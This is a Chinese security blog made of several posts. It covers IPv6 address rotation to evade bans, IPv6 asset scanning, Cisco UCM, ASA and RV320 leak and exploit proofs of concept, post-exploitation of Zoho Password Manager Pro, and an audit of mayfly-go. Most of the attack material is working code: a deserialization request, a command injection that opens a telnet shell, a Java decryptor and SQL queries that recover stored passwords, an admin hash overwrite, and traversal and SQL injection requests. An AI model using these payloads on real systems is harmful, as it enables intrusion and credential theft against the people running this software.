2401:c080:1400:6787:5400:4ff:fe3b:622b/64
2401:c080:1400:6787::/64

# 添加路由
ip route add local 2401:c080:1400:6787::/64 dev enp1s0

# 为了能够绑定任意 IP，我们需要开启内核的 ip_nonlocal_bind 特性：
sysctl net.ipv6.ip_nonlocal_bind=1

# NDP
# 类似于 IPv4 中 ARP 协议的作用，IPv6 中需要使用 ND 协议来发现邻居并确定可用路径。我们需要开启一个 ND 代理：
# 安装 ndppd
apt install ndppd

# 编辑 /etc/ndppd.conf 文件:
vim /etc/ndppd.conf

route-ttl 30000
proxy enp1s0 {
router no
timeout 500
ttl 30000
rule 2401:c080:1400:6787::/64 {
static
}
}

# 启动 ndppd
systemctl start ndppd

# 接下来你可以验证一下了，用 curl --interface 指定出口 IP：
curl --interface 2401:c080:1400:6787::1 ipv6.ip.sb
curl --interface 2401:c080:1400:6787::2 ipv6.ip.sb
curl --interface 2401:c080:1400:6787::3 http://icanhazip.com/

后来在看massdns项目的时候发现作者在freebind项目里实现了类似的需求

https://github.com/blechschmidt/freebind

测试下,先在机器上安装

git clone https://github.com/blechschmidt/freebind.git
cd freebind
apt install libnetfilter-queue-dev
make install

# 添加路由
ip -6 route add local 2a00:1450:4001:81b::/64 dev enp1s0

# 访问测试
freebind -r 2a00:1450:4001:81b::/64 wget -qO- ipv6.wtfismyip.com/text

那么网站方如何防御呢？

一种应对方式是直接 ban /64,/56乃至 /48

现在我们有了ipv6条件，那么接下来要找目标

如何获得目标的ipv6地址呢

如何收集目标ipv6资产

域名AAAA查询

经过进一步查询，得知AAAA类型的解析记录，可以实现IPv6的解析

使用dig进行查询

1
2

dig -t AAAA [域名]
dig -t AAAA +short [域名]

使用 dnsx 进行查询

1
2
3

echo ip.sb | dnsx -silent -aaaa
echo ip.sb | dnsx -silent -aaaa -resp-only
dnsx -aaaa -o output.txt -l input.txt

通过搜索引擎查找

目前各大搜索引擎基本都是支持ipv6的语法的,hunter好像不支持,可惜

fofa

https://fofa.info/

`1`	`is_ipv6=true && country="CN" && port="80" && protocol="http"`

quake

https://quake.360.net/

`1`	`is_ipv6:"true" && body:"登录"`

zoomeye

https://www.zoomeye.org/

`1`	`ip:"2600:3c00::f03c:91ff:fefc:574a"`

ASN查找

asnmap

https://github.com/projectdiscovery/asnmap

`1`	`echo hackerone.com \| ./asnmap -json -silent \| jq`

有些asn信息会有ipv6地址范围

ipv6地址扫描

ipv6掩码计算器

https://jennieji.github.io/subipv6/

fi6s

https://github.com/sfan5/fi6s

apt install gcc make git libpcap-dev
git clone https://github.com/sfan5/fi6s.git
cd fi6s
make BUILD_TYPE=release

1
2
3

./fi6s -p 80 2001:da8:9000:e013::199:4/115 --randomize-hosts 0

/fi6s -p 80,8000-8100 2001:db8::/120

实际测试速度很快，但是掩码小于/112的情况下，扫描结果数会直线下降,就很难扫出结果

naabu

https://github.com/projectdiscovery/naabu

`1`	`echo "2001:da8:9000:e013::199:4/118" \| naabu -iv 6 -p 80 -rate 4000 -retries 3 -c 30 -silent -si 60`

扫描速度比fi6s慢很多,但是漏报率低，精准度高.

Source & Reference

cisco设备信息泄漏漏洞案例2

Sat, 29 Oct 2022 12:00:00 +0800

上一篇文章介绍了cisco路由器设备的2个漏洞案例，这次补充cisco ip电话设备和安全设备的漏洞案例。

info

本文首发合天网安 https://mp.weixin.qq.com/s/uLcVV-jPiT1A_zTwqkpmgQ

CISCO-UCM ConfigFileCacheList.txt 泄漏

CISCO-UCM 全称Cisco Unified Communications Manager,是用于集成CISCO的语音视频通话、消息传递和移动协作的基础设施

部分 CUCM 服务器在端口 TCP/6970 上有一个 HTTP 服务,其中存在 ConfigFileCacheList.txt 文件,包含位于 TFTP 目录中的所有文件名.

fofa语句

`1`	`product=="CISCO-UCM"`

shodan语句

`1`	`http.html:"Cisco Unified Communications Manager"`

payload

`1`	`x.x.x.x:6970/ConfigFileCacheList.txt`

在目标文件中包含了许多SEP开头的文件，那是ip电话的配置文件，sep后面接的是mac地址

可以遍历下载这个ConfigFileCacheList.txt文件内容中的所有文件

在下载的配置文件中，包含ip，描述，端口等配置信息

甚至有的还会包含明文的账号密码

可以用egrep批量查找

`1`	`egrep -r 'Password' *.xml`

在配置文件中获得了账号密码后，可以尝试登录UCM的web后台

当然这个 ConfigFileCacheList.txt 泄漏比较少见，如果遇到UCM可以试试访问/cucm-uds/users路径,可以泄漏用户名信息，再针对用户名进一步爆破弱口令

CVE-2018-0296 Cisco ASA 目录遍历漏洞

Cisco ASA是思科的防火墙设备，一般用于在企业边界，包含了ips，avc，wse等应用功能。

fofa语句

`1`	`app="CISCO-ASA-5520"`

根据文章 https://www.anquanke.com/post/id/171916 中的描述,CVE-2018-0296在不同型号设备上存在2种利用场景，一种是拒绝服务造成设备崩溃重启，一种是目录遍历获得敏感信息

在修复方案中则是增加了对./和../的处理逻辑，以防止目录遍历

拒绝服务这里就不具体测试了，主要看下目录遍历的利用

检测poc

`1`	`/+CSCOU+/../+CSCOE+/files/file_list.json`

注意，类似的poc不能在浏览器里直接粘贴访问，因为浏览器会自动将访问的路径类似/../解析为上一级目录，也就是访问的为/+CSCOE+/files/file_list.json

列出 /sessions 目录的内容

`1`	`/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions`

提取登录用户的登录信息

`1`	`/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/[name]`

CVE-2020-3452 Cisco ASA 目录遍历漏洞

CVE-2020-3452漏洞可以在未验证的情况下进行任意文件读取

该漏洞源于 ASA 和 FTD 的 web 服务接口在处理 HTTP 请求的 URL 时缺乏正确的输入验证，导致攻击者可以在目标设备上查看系统内的web目录文件。

此漏洞不能用于获取对 ASA 或 FTD 系统文件或底层操作系统 (OS) 文件的访问，所以只能读取 web 系统目录的文件，比如 webvpn 的配置文件、书签、网络 cookies、部分网络内容和超文本传输协议网址等信息。

作者在推特分享的检测poc

https://twitter.com/aboul3la/status/1286141887716503553

1
2

/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

读取 /+CSCOE+/portal_inc.lua 文件

至于进一步利用，有研究人员给出了一些已知文件列表

https://twitter.com/HackerGautam/status/1286652700432662528

https://raw.githubusercontent.com/3ndG4me/CVE-2020-3452-Exploit/master/cisco_asa_file_list.txt

不过实际测试，除了session.js 跑出了一个乱码的内容以外，其他的文件多是一些资源文件，难以进一步利用。

Source & Reference

Zoho Password Manager Pro后利用技巧

Fri, 28 Oct 2022 12:00:00 +0800

学习pmp这块相关知识点，做个简单的总结

info

本文首发跳跳糖社区 https://tttang.com/archive/1791/

指纹

1
2
3

server=="PMP"

默认开启在7272端口

安装

https://www.manageengine.com/products/passwordmanagerpro/help/installation.html

windows

下载安装包，双击一路下一步即可

`1`	`https://archives2.manageengine.com/passwordmanagerpro/12100/ManageEngine_PMP_64bit.exe`

访问127.0.0.1:7272

linux

下载安装包

https://archives2.manageengine.com/passwordmanagerpro/10501/ManageEngine_PMP_64bit.bin

chmod a+x ManageEngine_PMP_64bit.bin
./ManageEngine_PMP_64bit.bin -i console
cd /root/ManageEngine/PMP/bin
bash pmp.sh install

等待安装完毕，访问127.0.0.1:7272即可

远程调试

这里以windows为例

用process hacker查看服务启动后相关的进程和运行参数

java进程的启动参数：

"..\jre\bin\java" -Dcatalina.home=.. -Dserver.home=.. -Dserver.stats=1000 -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.util.logging.config.file=../conf/logging.properties -Djava.util.logging.config.class=com.adventnet.logging.LoggingScanner -Dlog.dir=.. -Ddb.home=../pgsql -Ddatabaseparams.file=./../conf/database_params.conf -Dstart.webclient=false -Dgen.db.password=true -Dsplashscreen.progress.color=7515939 -Dsplashscreen.fontforeground.color=7515939 -Dsplashscreen.fontbackground.color=-1 -Dsplash.filename=../images/passtrix_splash.png -Dsplashscreen.font.color=black -Djava.io.tmpdir=../logs -DcontextDIR=PassTrix -Dcli.debug=false -DADUserNameSyntax=domain.backslash.username -Duser.home=../logs/ -Dnet.phonefactor.pfsdk.debug=false -server -Dfile.encoding=UTF8 -Xms50m -Xmx512m -Djava.library.path="../lib/native" -classpath "../lib/wrapper.jar;../lib/tomcat/tomcat-juli.jar;run.jar;../tools.jar;../lib/AdventNetNPrevalent.jar;../lib/;../lib/AdventNetUpdateManagerInstaller.jar;../lib/conf.jar" -Dwrapper.key="n37Dhzdw8A8BWgGmjTi3w37jMJIKvUuZ" -Dwrapper.port=32000 -Dwrapper.jvm.port.min=31000 -Dwrapper.jvm.port.max=31999 -Dwrapper.pid=1000 -Dwrapper.version="3.5.25-pro" -Dwrapper.native_library="wrapper" -Dwrapper.arch="x86" -Dwrapper.service="TRUE" -Dwrapper.cpu.timeout="10" -Dwrapper.jvmid=1 -Dwrapper.lang.domain=wrapper -Dwrapper.lang.folder=../lang org.tanukisoftware.wrapper.WrapperSimpleApp com.adventnet.mfw.Starter

java进程的父进程为wrapper.exe，启动参数：

`1`	`"C:\Program Files\ManageEngine\PMP\bin\wrapper.exe" -s "C:\Program Files\ManageEngine\PMP\conf\wrapper.conf"`

查看文件C:\Program Files\ManageEngine\PAM\conf\wrapper.conf

其中存在几行被注释的调试选项

#uncomment the following to enable JPDA debugging
#wrapper.java.additional.27=-Xdebug
#wrapper.java.additional.28=-Xnoagent
#wrapper.java.additional.29=-Xrunjdwp:transport=dt_socket,address=8787,server=y,suspend=n

取消注释

1
2
3

wrapper.java.additional.27=-Xdebug
wrapper.java.additional.28=-Xnoagent
wrapper.java.additional.29=-Xrunjdwp:transport=dt_socket,address=8787,server=y,suspend=n

重启服务，再次查看java进程的参数：

IDEA设置如下

判断版本

在访问站点时，其默认加载的js、css路径中就包含了版本信息，如下图，12121代表其版本号

在官方站点可以下载相应版本号的安装包

https://archives2.manageengine.com/passwordmanagerpro/

CVE-2022-35405

这个洞影响范围 12100 及以下版本，在 12101 被修复

poc

使用ysoserial的CommonsBeanutils1来生成Payload：

`1`	`java -jar ysoserial.jar CommonsBeanutils1 "ping uqgr9k.dnslog.cn" \| base64 \| tr -d "\n"`

替换到下面的[base64-payload]部分

POST /xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

密钥文件

windows

以windows平台的pmp为例

database_params.conf文件中存储了数据库的用户名和加密数据库密码。

# $Id$
# driver name
drivername=org.postgresql.Driver

# login username for database if any
username=pmpuser

# password for the db can be specified here
password=NYubvnnJJ6ii871X/dYr5xwkr1P6yGCEeoA=
# url is of the form jdbc:subprotocol:DataSourceName for eg.jdbc:odbc:WebNmsDB
url=jdbc:postgresql://localhost:2345/PassTrix?ssl=require

# Minumum Connection pool size
minsize=1

# Maximum Connection pool size
maxsize=20

# transaction Isolation level
#values are Constanst defined in java.sql.connection type supported TRANSACTION_NONE 	0
#Allowed values are TRANSACTION_READ_COMMITTED , TRANSACTION_READ_UNCOMMITTED ,TRANSACTION_REPEATABLE_READ , TRANSACTION_SERIALIZABLE
transaction_isolation=TRANSACTION_READ_COMMITTED
exceptionsorterclassname=com.adventnet.db.adapter.postgres.PostgresExceptionSorter

# check is the database password encrypted or not
db.password.encrypted=true

可以看到默认 pgsql 用户为pmpuser,而加密的数据库密码为NYubvnnJJ6ii871X/dYr5xwkr1P6yGCEeoA=

pmp_key.key文件显示 PMP 密钥,这个用于加密数据库中的密码

#本文件是由PMP自动生成的，它包含了本次安装所使用的AES加密主密钥。
#该文件默认存储在<PMP_HOME>/conf目录中。除非您的服务器足够安全，不允许其他任何非法访问，
#否则，该文件就有可能泄密，属于安全隐患。因此，强烈建议您将该文件从默认位置移动到
#PMP安装服务器以外的其它位置（如：文件服务器、U盘等），并按照安全存储要求保存该文件。
#Fri Oct 21 16:08:30 CST 2022
ENCRYPTIONKEY=G8N1EX+nkQlPVpd29eenVOYWCCS0oF/EPZdswlorot8\=

Linux

database_params.conf文件存放在/root/ManageEngine/PMP/conf/database_params.conf

pmp_key.key文件存放在/root/ManageEngine/PMP/conf/pmp_key.key

恢复pgsql的密码

要连接pgsql，首先需要解密pmp加密的pgsql数据库密码

找下pmp对数据库密码的加密逻辑，在shielder的文章 https://www.shielder.com/blog/2022/09/how-to-decrypt-manage-engine-pmp-passwords-for-fun-and-domain-admin-a-red-teaming-tale/ 给出了加密类

找到对应jar文件

反编译查看解密的逻辑

可以发现encodedKey是取@dv3n7n3tP@55Tri*的5到10位

通过使用其DecryptDBPassword函数可以解密数据库密码，不过在shielder的文章中给出了解密的代码,直接解密

import java.security.InvalidAlgorithmParameterException;
import java.security.InvalidKeyException;
import java.security.Key;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.spec.InvalidKeySpecException;
import java.util.Base64;
import java.lang.StringBuilder;

import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

class PimpMyPMP {
    public synchronized String decrypt(byte[] cipherText, String password) throws Exception {
        Cipher cipher;
        byte[] aeskey;

        for (int i = password.length(); i < 32; ++i) {
            password = password + " ";
        }
        if (password.length() > 32) {
            try {
                aeskey = Base64.getDecoder().decode(password);
            } catch (IllegalArgumentException e) {
                aeskey = password.getBytes();
            }
        }
        aeskey = password.getBytes();
        try {
            byte[] ivArr = new byte[16];
            for (int i = 0; i < 16; ++i) {
                ivArr[i] = cipherText[i];
            }
            cipher = Cipher.getInstance("AES/CTR/NoPadding");
            SecretKeyFactory factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
            PBEKeySpec spec = new PBEKeySpec(new String(aeskey, "UTF-8").toCharArray(), new byte[]{1, 2, 3, 4, 5, 6, 7, 8}, 1024, 256);
            SecretKey temp = factory.generateSecret(spec);
            SecretKeySpec secret = new SecretKeySpec(temp.getEncoded(), "AES");
            cipher.init(2, (Key) secret, new IvParameterSpec(ivArr));

            byte[] cipherTextFinal = new byte[cipherText.length - 16];
            int j = 0;
            for (int i = 16; i < cipherText.length; ++i) {
                cipherTextFinal[j] = cipherText[i];
                ++j;
            }

            return new String(cipher.doFinal(cipherTextFinal), "UTF-8");
        } catch (IllegalBlockSizeException | BadPaddingException | NoSuchAlgorithmException | NoSuchPaddingException |
                 InvalidKeyException | InvalidAlgorithmParameterException | InvalidKeySpecException ex) {
            ex.printStackTrace();
            throw new Exception("Exception occurred while encrypting", ex);
        }
    }

    private static String hardcodedDBKey() throws NoSuchAlgorithmException {
        String key = "@dv3n7n3tP@55Tri*".substring(5, 10);
        MessageDigest md = MessageDigest.getInstance("MD5");
        md.update(key.getBytes());
        byte[] bkey = md.digest();
        StringBuilder sb = new StringBuilder(bkey.length * 2);
        for (byte b : bkey) {
            sb.append(String.format("%02x", b));
        }
        return sb.toString();
    }

    public String decryptDBPassword(String encPassword) throws Exception {
        String decryptedPassword = null;
        if (encPassword != null) {
            try {
                decryptedPassword = this.decryptPassword(encPassword, PimpMyPMP.hardcodedDBKey());
            } catch (Exception e) {
                throw new Exception("Exception ocuured while decrypt the password");
            }
            return decryptedPassword;
        }
        throw new Exception("Password should not be Null");
    }

    public String decryptPassword(String encryptedPassword, String key) throws Exception {
        String decryptedPassword = null;
        if (encryptedPassword == null || "".equals(encryptedPassword)) {
            return encryptedPassword;
        }
        try {
            byte[] encPwdArr = Base64.getDecoder().decode(encryptedPassword);
            decryptedPassword = this.decrypt(encPwdArr, key);
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        return decryptedPassword;
    }

    public static void main(String[] args) {
        PimpMyPMP klass = new PimpMyPMP();
        try {
            // database_params.conf
            String database_password = "";
            System.out.print("Database Key: ");
            System.out.println(klass.decryptDBPassword(database_password));

            // pmp_key.key
            String pmp_password = "";

            // select notesdescription from Ptrx_NotesInfo
            String notesdescription = "";
            System.out.print("MASTER Key: ");
            System.out.println(klass.decryptPassword(notesdescription, pmp_password));

            // decryptschar(column, master_key)
            String passwd = "";
            System.out.print("Passwd: ");
            System.out.println(klass.decryptPassword(passwd, pmp_password));

        } catch (Exception e) {
            System.out.println("Fail!");
        }
    }
}

填入加密的数据库密码，查看结果

可以看到密码为:sC1ekMrant

连接pgsql测试

这里注意,pmp默认的pgsql是只监听127的2345，无法外部连接，如果是rce打的，可以自行进行端口转发

获取`master key`

在连接数据库后，查询加密的master key

`1`	`select notesdescription from Ptrx_NotesInfo`

这里通过pmp_key.key文件中的PMP 密钥来解密master key

shielder的代码在解的时候有些问题，这里使用https://github.com/trustedsec/Zoinks项目来进行解密

得到master key

解密数据库中的密码

首先先查询数据库中的存储的密码

select ptrx_account.RESOURCEID, ptrx_resource.RESOURCENAME, ptrx_resource.RESOURCEURL, ptrx_password.DESCRIPTION, ptrx_account.LOGINNAME, decryptschar(ptrx_passbasedauthen.PASSWORD,'***master_key***') from ptrx_passbasedauthen LEFT JOIN ptrx_password ON ptrx_passbasedauthen.PASSWDID = ptrx_password.PASSWDID LEFT JOIN ptrx_account ON ptrx_passbasedauthen.PASSWDID = ptrx_account.PASSWDID LEFT JOIN ptrx_resource ON ptrx_account.RESOURCEID = ptrx_resource.RESOURCEID

用master key替换语句里的***master_key***部分

继续使用Zoinks进行解密

这里解密出test资源,root用户的明文口令123456

解密代理配置

当配置了代理服务器时,同样用类似的方法进行查询和解密

`1`	`select proxy_id,direct_connection,proxy_server,proxy_port,username,decryptschar(ptrx_proxysettings.PASSWORD,'*master_key*') from ptrx_proxysettings`

解密邮件服务器配置

pmp这个默认都是配置了邮件服务器的

`1`	`select mailid,mailserver,mailport,sendermail,username,decryptschar(ptrx_mailsettings.PASSWORD,'*master_key*'),tls,ssl,tlsifavail,never from ptrx_mailsettings`

pg数据库postgres用户密码

`1`	`select username,decryptschar(dbcredentialsaudit.PASSWORD,'*master_key*'),last_modified_time from dbcredentialsaudit`

进入 pmp web后台

在数据库中查询web后台的账号密码

`1`	`select * from aaauser;`

`1`	`select * from aaapassword;`

这里密码是进行bcryptsha512加密的，可以用hashcat进行爆破

也可通过覆盖hash的方式修改admin账号的密码，例如修改为下列数据，即可将admin密码改为test2

1
2

"password_id"	"password"	"algorithm"	"salt"	"passwdprofile_id"	"passwdrule_id"	"createdtime"	"factor"
"1"	"$2a$12$bOUtxZzgrAu.3ApJM7fUYu7xBfxhJ4k2gx5CQE5BzMcN.cr/6cbhy"	"bcrypt"	"wwwECQECvU8zqfmCnXfSTgFnfz9CDl/cX+yDwJEhJ+91ADnOHbR0q7rOASpBqm2mQgYLHtlUJSX5u4ad7yOJpVNkoPJoI6gev75VAwAf/BTM4rpHTLT+cCdWMwnHmg=="	"1"	"3"	"1666345834309"	"12"

注意⚠️：覆盖前务必备份源hash数据

进入后台后可直接导出所有明文密码

`1`	`/jsp/xmlhttp/AjaxResponse.jsp?RequestType=ExportPasswords`

本地 Web-Accounts reports 文件

在后台personal页面导出个人报告时可以选择pdf或xls格式，该文件在导出后会一直存在在服务器上

这个问题在12122被修复

ppm 文件的安装方法

ppm是pmp的更新包，在windows上通过UpdateManager.bat进行安装，在linux上通过UpdateManager.sh进行安装

https://www.manageengine.com/products/passwordmanagerpro/help/faq.html

Source & Reference

cisco设备信息泄漏漏洞案例

Fri, 21 Oct 2022 12:00:00 +0800

近期遇到了几个cisco配置信息泄漏的案例，借此机会复现下cisco常见的几个漏洞。

info

本文首发合天网安 https://mp.weixin.qq.com/s/efrcXS_uiXp0LzUaaEJ-MA

cisco SMI 配置泄漏

Cisco SMI 是一种即插即用功能，可为 Cisco 交换机提供零接触部署并在 TCP 端口 4786 上进行通信。如果发现开放4786端口的cisco设备，那可以深入测试一下。

fofa 语句 protocol=“smi”

影响目标还挺多的

git clone https://github.com/ChristianPapathanasiou/CiscoSmartInstallExploit
cd CiscoSmartInstallExploit
pip2 install tftpy
python2 cisco.py [ip]

注意用python2运行,运行成功会下载目标的运行配置

配置文件中存有设备用户密码，ACL配置，ftp配置账号密码等敏感信息

如果想进一步分析配置文件可以下载 ccat 工具进行自动化分析

https://github.com/frostbits-security/ccat

git clone https://github.com/frostbits-security/ccat.git
cd ccat
pip3 install -r requirements.txt
python3 ccat.py configuration_file

我们可以使用 –dump-creds 参数dump出账号密码

文件名m500的可以用hashcat -m 500的掩码进行爆破,5700同理

CVE-2019-1652 && CVE-2019-1653

Cisco RV320 路由器的配置可以在未经身份验证的情况下通过设备的 Web 界面导出。

fofa 语句 app=“CISCO-RV320”

对应poc

`1`	`ip:port/cgi-bin/config.exp`

下载的配置文件中有账号和md5的密码,不过md5的格式为 md5($password.$auth_key)，其中 auth_key 是一个静态值，可以通过直接访问 / 路径找到。

当然在通过 CVE-2019-1653 获得了账号和md5的密码后可以通过替换登录包的hash进行登录,无需解密

后台可以配合 CVE-2019-1652 进行 rce

github上的利用poc由于不支持目标的自签名证书 https://github.com/0x27/CiscoRV320Dump/blob/master/easy_access.py 这里就手动发包进行测试

POST /certificate_handle2.htm?type=4 HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: mlap=RGVmYXVsdDk6Ojo6Y2lzY28=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 319

page=self_generator.htm&totalRules=1&OpenVPNRules=30&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A&organization=A&organization_unit=A&email=ab%40example.com&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&SelectSubject_s=1&common_name=a%27%24%28telnetd%20-l%20%2Fbin%2Fsh%20-p%201337%29%27b

payload执行后会用telnet在本地监听1337口

连接验证

总结

cisco设备国内互联网公司和企事业用的不多，近年来都被国产品牌替换了。
python的poc经常会遇到一些历史遗留问题，比如tls版本过低，依赖库安装报错不兼容等等问题，建议还是用go写poc，利人利己。

mayfly-go审计学习

Thu, 06 Oct 2022 12:00:00 +0800

这个程序我以为是web数据库管理工具，结果还自带堡垒机的功能，后台功能点都使用了一遍，感觉确实不错，配合工具找了几个后台的洞，危害不大.

https://github.com/may-fly/mayfly-go

指纹特征

`1`	`fofa: "mayfly, 后台管理"`

后台目录遍历

在后台运维-机器列表-机器操作-文件处，点击查看文件

正常的请求

GET http://10.211.55.3:8888/api/machines/10/files/40/read?fileId=40&path=%2Ftmp%2F&machineId=10 HTTP/1.1
Host: 10.211.55.3:8888
Accept: application/json, text/plain, */*
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjUwODAxMjcsImlkIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.qf3LuOfc7-kZYYQVXZ6TSx3CGZLXKhoN_2kG1PUGhyI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Referer: http://10.211.55.3:8888/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

修改path的值

GET /api/machines/10/files/42/read?fileId=42&machineId=10&path=%2Ftmp%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 10.211.55.3:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjUwODAxMjcsImlkIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.qf3LuOfc7-kZYYQVXZ6TSx3CGZLXKhoN_2kG1PUGhyI
Referer: http://10.211.55.3:8888/
Accept-Encoding: gzip

而path的值直接用 /etc/passwd 是不行的,来看看代码

定位到 server/internal/machine/api/machine_file.go

func (m *MachineFile) ReadFileContent(rc *ctx.ReqCtx) {
	g := rc.GinCtx
	fid := GetMachineFileId(g)
	readPath := g.Query("path")
	readType := g.Query("type")

	sftpFile := m.MachineFileApp.ReadFile(fid, readPath)
	defer sftpFile.Close()

	fileInfo, _ := sftpFile.Stat()
	// 如果是读取文件内容，则校验文件大小
	if readType != "1" {
		biz.IsTrue(fileInfo.Size() < max_read_size, "文件超过1m，请使用下载查看")
	}

	rc.ReqParam = fmt.Sprintf("path: %s", readPath)
	// 如果读取类型为下载，则下载文件，否则获取文件内容
	if readType == "1" {
		// 截取文件名，如/usr/local/test.java -》 test.java
		path := strings.Split(readPath, "/")
		rc.Download(sftpFile, path[len(path)-1])
	} else {
		datas, err := io.ReadAll(sftpFile)
		biz.ErrIsNilAppendErr(err, "读取文件内容失败: %s")
		rc.ResData = string(datas)
	}
}

可以看到，对 path 的内容没有过滤。且当 type=1 时，是作为下载文件流返回的

那么这个点到底算不算漏洞，我认为是漏洞，但没有危害，因为后台本身就是可以远程连接运维主机的，但参数没有进行过滤也确实是问题所在，所以是漏洞，无实际危害。

后台命令注入

在后台运维-机器列表-机器操作-文件处，点击进程

看下正常请求包

GET http://10.211.55.3:8888/api/machines/10/process?name=&sortType=1&count=10&id=10 HTTP/1.1
Host: 10.211.55.3:8888
Accept: application/json, text/plain, */*
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjUwODAxMjcsImlkIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.qf3LuOfc7-kZYYQVXZ6TSx3CGZLXKhoN_2kG1PUGhyI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Referer: http://10.211.55.3:8888/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

修改下 count 的值

GET http://10.211.55.3:8888/api/machines/10/process?name=&sortType=1&count=10%7Cid&id=10 HTTP/1.1
Host: 10.211.55.3:8888
Accept: application/json, text/plain, */*
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjUwODAxMjcsImlkIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.qf3LuOfc7-kZYYQVXZ6TSx3CGZLXKhoN_2kG1PUGhyI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Referer: http://10.211.55.3:8888/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

来看看代码

定位到 server/internal/machine/api/machine.go

// 获取进程列表信息
func (m *Machine) GetProcess(rc *ctx.ReqCtx) {
	g := rc.GinCtx
	cmd := "ps -aux "
	sortType := g.Query("sortType")
	if sortType == "2" {
		cmd += "--sort -pmem "
	} else {
		cmd += "--sort -pcpu "
	}

	pname := g.Query("name")
	if pname != "" {
		cmd += fmt.Sprintf("| grep %s ", pname)
	}

	count := g.Query("count")
	if count == "" {
		count = "10"
	}

	cmd += "| head -n " + count

	cli := m.MachineApp.GetCli(GetMachineId(rc.GinCtx))
	biz.ErrIsNilAppendErr(m.ProjectApp.CanAccess(rc.LoginAccount.Id, cli.GetMachine().ProjectId), "%s")

	res, err := cli.Run(cmd)
	biz.ErrIsNilAppendErr(err, "获取进程信息失败: %s")
	rc.ResData = res
}

可以看到 count 参数没有进行过滤，拼接到了 cmd 变量的后面，造成了命令注入

这个漏洞和上面那个一样，我认为是漏洞，但危害不大，不过这个命令执行后在后台日志里是看不到的。

后台sql盲注 1处

在后台-账号管理处进行查询

看下 poc

GET /api/sys/accounts?username=admin%E9%8E%88%27%22%5C%28 HTTP/1.1
Host: 10.211.55.3:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjUwODAxMjcsImlkIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.qf3LuOfc7-kZYYQVXZ6TSx3CGZLXKhoN_2kG1PUGhyI
Referer: http://10.211.55.3:8888/
Accept-Encoding: gzip

测一下，可以跑出来

定位到代码中看下问题 server/internal/sys/api/account.go

// @router /accounts [get]
func (a *Account) Accounts(rc *ctx.ReqCtx) {
	condition := &entity.Account{}
	condition.Username = rc.GinCtx.Query("username")
	rc.ResData = a.AccountApp.GetPageList(condition, ginx.GetPageParam(rc.GinCtx), new([]vo.AccountManageVO))
}

无任何过滤

这个注入影响平台本身，还是有些危害的。

后台sql盲注 2处

后台数据操作处

GET /api/dbs/13/t-index?db=mayfly-go&id=13&tableName=t_sys_role_resource%27and%27n%27%3D%27n HTTP/1.1
Host: 10.211.55.3:8888
